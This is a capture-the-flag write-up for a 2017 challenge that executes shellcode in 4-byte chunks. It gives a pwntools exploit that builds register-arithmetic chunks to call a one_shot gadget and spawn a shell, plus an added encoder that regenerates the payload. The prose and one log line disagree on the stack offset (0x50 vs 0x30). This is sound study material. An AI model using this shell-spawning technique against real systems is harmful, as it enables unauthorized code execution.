The challenge executes the shellcode 4 bytes at a time, and it initializes (clears) the main registers before running each chunk.
So I used r14 to write NULL to rsp+0x50, then used a one_shot gadget to get a shell.
Every chunk in the payload below is a single 3-byte instruction followed by either ret (0xC3) or nop (0x90); the only exception is the 4-byte mov r14, [rbp+0x18], which has no room for a terminator.
#!/usr/bin/env python3
# powerprove
from pwn import *

context.arch = "amd64"

# Built but never sent: the final exploit calls the one_shot gadget instead.
shellcode = b"\x90" * 100
shellcode += asm(shellcraft.amd64.linux.sh())

if __name__ == "__main__":
    s = remote("localhost", 4000)
    input("googlectf 2017")  # pause here to attach a debugger

    log.info("making rsp+0x30 = NULL")
    payload = b""
    payload += b"\x49\x89\xE6\xC3"          # mov r14, rsp ; ret
    payload += b"\x4D\x01\xD6\xC3"          # add r14, r10 ; ret
    payload += b"\x4D\x01\xD6\xC3"          # add r14, r10 ; ret
    payload += b"\x49\xFF\xC6\xC3" * 0xc    # inc r14 ; ret
    payload += b"\x4D\x89\x3E\x90"          # mov QWORD PTR [r14], r15 ; nop

    log.info("making one_shot")
    payload += b"\x4C\x8B\x75\x18"          # mov r14, [rbp + 0x18]  (4-byte instruction, no terminator)
    payload += b"\x4D\x01\xD6\x90" * 6      # add r14, r10 ; nop
    payload += b"\x49\xFF\xC6\x90" * 3      # inc r14 ; nop
    payload += b"\x4D\x01\xDE\xC3" * 4      # add r14, r11 ; ret
    payload += b"\x4D\x01\xD6\xC3" * 8      # add r14, r10 ; ret
    payload += b"\x49\xFF\xC6\xC3" * 0x1c   # inc r14 ; ret
    payload += b"\x41\xFF\xD6\xC3"          # call r14 ; ret

    s.send(payload)
    s.interactive()
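The payload above is typed in by hand as raw hex, which is easy to get wrong (a wrong ModRM byte silently targets another register, and a 5-byte instruction would spill into the next chunk). The following is an added example, not code from the original write-up: a small hand-written x86-64 encoder for exactly the instruction forms the payload uses (register-to-register mov/add, inc, call reg, mov [reg], reg and mov reg, [reg+disp8]), plus a chunk() helper that enforces the 4-byte slot and pads with nop before the ret or nop terminator. stage1() and stage2() rebuild the two halves of the payload from mnemonics so they can be checked against the hand-typed bytes. The register and encoding tables are assumptions taken from the REX/ModRM rules of the x86-64 ISA; nothing here talks to the challenge binary.

```python
# Added example: minimal x86-64 encoder for the 4-byte-chunk payload style.
# Only the operand forms needed above are supported (assumption: nothing else
# is required). SIB bytes are never emitted, so [rsp]/[r12] bases are rejected.

REGS = {name: i for i, name in enumerate(
    "rax rcx rdx rbx rsp rbp rsi rdi r8 r9 r10 r11 r12 r13 r14 r15".split())}
NOP, RET = b"\x90", b"\xc3"


def rex(w, reg, rm):
    """REX prefix 0100WRXB; R extends the reg field, B the r/m field (X unused)."""
    return bytes([0x40 | (w << 3) | ((reg >> 3) << 2) | (rm >> 3)])


def modrm(mod, reg, rm):
    return bytes([(mod << 6) | ((reg & 7) << 3) | (rm & 7)])


def mov_rr(dst, src):
    """mov dst, src   (REX.W 89 /r: r/m64 = dst, reg field = src)."""
    d, s = REGS[dst], REGS[src]
    return rex(1, s, d) + b"\x89" + modrm(3, s, d)


def add_rr(dst, src):
    """add dst, src   (REX.W 01 /r)."""
    d, s = REGS[dst], REGS[src]
    return rex(1, s, d) + b"\x01" + modrm(3, s, d)


def inc_r(reg):
    """inc reg        (REX.W FF /0)."""
    r = REGS[reg]
    return rex(1, 0, r) + b"\xff" + modrm(3, 0, r)


def call_r(reg):
    """call reg       (FF /2; 64-bit by default, so only REX.B for r8-r15)."""
    r = REGS[reg]
    prefix = rex(0, 0, r) if r >= 8 else b""
    return prefix + b"\xff" + modrm(3, 2, r)


def store_r(base, src):
    """mov [base], src (REX.W 89 /r with mod=00)."""
    b, s = REGS[base], REGS[src]
    if b & 7 in (4, 5):  # rsp/r12 need a SIB byte, rbp/r13 need a displacement
        raise ValueError("base %s needs SIB/disp, not supported" % base)
    return rex(1, s, b) + b"\x89" + modrm(0, s, b)


def load_disp8(dst, base, disp):
    """mov dst, [base+disp8] (REX.W 8B /r with mod=01)."""
    d, b = REGS[dst], REGS[base]
    if b & 7 == 4 or not -128 <= disp < 128:
        raise ValueError("unsupported base register or displacement")
    return rex(1, d, b) + b"\x8b" + modrm(1, d, b) + bytes([disp & 0xff])


def chunk(code, end=RET):
    """Fit one instruction into a 4-byte slot: nop padding, then the terminator."""
    if len(code) + len(end) > 4:
        raise ValueError("%r does not fit in a 4-byte chunk" % code)
    return code + NOP * (4 - len(code) - len(end)) + end


def build_payload(plan):
    """plan: list of (instruction bytes, terminator, repeat count)."""
    return b"".join(chunk(code, end) * n for code, end, n in plan)


def stage1():
    """r14 = rsp, add r10 twice, inc 0xc times, then store r15 through r14."""
    return build_payload([
        (mov_rr("r14", "rsp"),  RET, 1),
        (add_rr("r14", "r10"),  RET, 2),
        (inc_r("r14"),          RET, 0xc),
        (store_r("r14", "r15"), NOP, 1),
    ])


def stage2():
    """Reload r14 from [rbp+0x18], adjust it with r10/r11/inc, then call it."""
    return build_payload([
        (load_disp8("r14", "rbp", 0x18), b"", 1),
        (add_rr("r14", "r10"), NOP, 6),
        (inc_r("r14"),         NOP, 3),
        (add_rr("r14", "r11"), RET, 4),
        (add_rr("r14", "r10"), RET, 8),
        (inc_r("r14"),         RET, 0x1c),
        (call_r("r14"),        RET, 1),
    ])


if __name__ == "__main__":
    for p in (stage1(), stage2()):
        print(" ".join(p[i:i + 4].hex() for i in range(0, len(p), 4)))
```

Running it prints each stage as space-separated 4-byte chunks, which can be compared line by line against the literals in the exploit; an instruction that cannot fit (for example a 5-byte encoding, or a store through r12 that would need a SIB byte) raises instead of producing a misaligned chunk.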